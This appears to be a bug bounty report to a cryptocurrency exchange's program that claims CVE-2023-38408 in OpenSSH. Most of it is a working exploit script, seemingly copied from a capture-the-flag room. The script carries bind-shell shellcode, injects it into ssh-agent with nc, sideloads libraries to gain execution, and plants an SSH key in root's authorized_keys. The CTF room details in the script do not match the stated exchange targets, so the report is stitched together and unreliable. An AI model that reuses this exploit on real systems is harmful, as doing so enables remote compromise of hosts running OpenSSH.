*.kucoin.com

Hello Good Time!

Subject: Bounty bug report for CVE-2023-38408 in OpenSSH

Summary: I am submitting a Bounty bug report regarding a security vulnerability identified as CVE-2023-38408 in OpenSSH that specifically affects the ssh-agent component in versions prior to 9.3p2.

Vulnerability Details: CVE ID: CVE-2023-38408 Affected software: OpenSSH (ssh agent component) Affected Versions: OpenSSH versions prior to 9.3p2 Problem type: SSH-Agent remote code execution CVSS Severity Score: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description: The vulnerability CVE-2023-38408 is due to an insufficiently trusted search path used by the PKCS#11 feature in ssh-agent. In scenarios where an attacker can send an ssh agent to a system controlled by the attacker, it is possible to exploit this vulnerability to execute remote code on the compromised system. Notably, this issue is related to an incomplete fix for an earlier security concern, CVE-2016-10009.

the effect: The potential impact of this vulnerability includes unauthorized remote code execution on systems with vulnerable versions of OpenSSH, which could lead to significant system security compromise, data breach, or other malicious activity.

recommendations: OpenSSH Update: To mitigate this vulnerability, users are strongly advised to update their OpenSSH installation to version 9.3p2 or later, where the issue is fixed.

Update Please upgrade Openssh to the latest version to patch the vulnerability openssh 9.6

https://www.openssh.com/releasenotes.html

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2023-38408

https://www.cybersecurity-help.cz/vdb/SB2023072068

Target:

https://api.kucoin.com/

http://52.28.186.22:49155/

Impact:

By exploiting this vulnerability, an attacker can execute arbitrary code on the target system. This can lead to the entire system being compromised and allow an attacker to gain unauthorized access, manipulate data, or perform other malicious activities.

POC Code .SH Format:

echo " . . . .___ " echo " / /|| | / | | _________ | /______ " echo " _____ \ | |/ __ |/ __ | | / _ __ \ / __ |/ __ _ __ \ " echo " / | / // \ /| |( <> ) __ _/ // \ /| | /" echo "/____ /|__ |___ >_______ _(_ /____ |___ >__| " echo " / / / / / / / "

echo "CVE-2023-38408 PoC"

echo;echo

#GET ATTACKERIP 3 OPTIONS: Input,Hard-Coded,Full-Auto #read -p "Enter the AttackerBox IP address: " attackerIP #attackerIP=10.10.123.236 attackerIP=$(ip a|grep ens5|grep inet|cut -d '/' -f 1|cut -d ' ' -f 6)

#GET ROOMIP: 3 OPTIONS: Input,Hard-Coded,Full-Auto read -p "Enter the ROOM IP address: " roomIP #roomIP=10.10.83.183

Run the arp,extract the 3rd row with sed,

extract IP using awk, cutting the ()

#roomIP=$(arp -a | sed -n '3p' | awk -F'[()]' '{print $2}')

echo "Room IP address: $roomIP"

echo -e "\nFrom ATTACKBOX, in new term, login with SSH. Type \e[1;32mssh redqueenrebel@$roomIP\e[0m" echo -e "Enter password \e[1;32m'DownTheRabbitHole!'\e[0m"

function Wait_for_EnterKey { echo -e "\nI'll wait for you here..." while true; do echo "Press Enter to continue:" read -rsn 1 key

if [[ $key == "" ]]; then
    echo "Continuing..."
    break
else
    echo -e "\033[1A\033[KInvalid key pressed. Press Enter to continue:"
fi

done

}

#CLEAR TMP DIR OF PRIOR SSH-SESSIONS rm -rf /tmp/ssh*

#ADD ALICE SSH KEY echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation" >> /root/.ssh/authorized_keys

echo -e "\nEnter this command in redqueen term: \e[1;32mecho ${attackerIP} > /tmp/ip.txt\e[0m"

Wait_for_EnterKey

#Wait for connection echo -e "\nWait 1 min for background connection...\n" sleep 60

#FIND SSH-AGENT AND SET AS ENV VAR agent_path=$(echo /tmp/ssh-/agent.) export SSH_AUTH_SOCK="$agent_path" echo -e "\nSSH_AUTH_SOCK set to: $SSH_AUTH_SOCK\n"

#Sideload 1st library ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub

SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'

#UPLOAD SHELLCODE TO VICTIM '&' makes this command a background job (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK" &

#WAIT FOR TRANSFER TO FINISH echo -e "\nTransfering your shellcode now. Please stand by..." sleep 10 kill $! #Sends an interupt signal to the background job (like Ctrl-C) echo -e "Transfer complete\n"

#Sideload 2nd library to register the signal handler for the Segmentation Fault (SIGSEGV) signal. ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so

#Sideload 3rd replaces the signal handler routine with a gadget that redirects execution back to the stack ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0

echo -e "\nOK! Last steps...Hit \e[1;32mEnter\e[0m," echo -e "then In redqueen terminal, type \e[1;32mnc localhost 31337\e[0m to access the bind shell (shellcode)." echo -e "\nEnjoy your shell! For Flag type \e[1;32mcat /home/alice/Desktop/*\e[0m"

#Sideload last library to cause segfault and execute the shellcode ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0

#Keep script running for connection to bind shell while true; do true done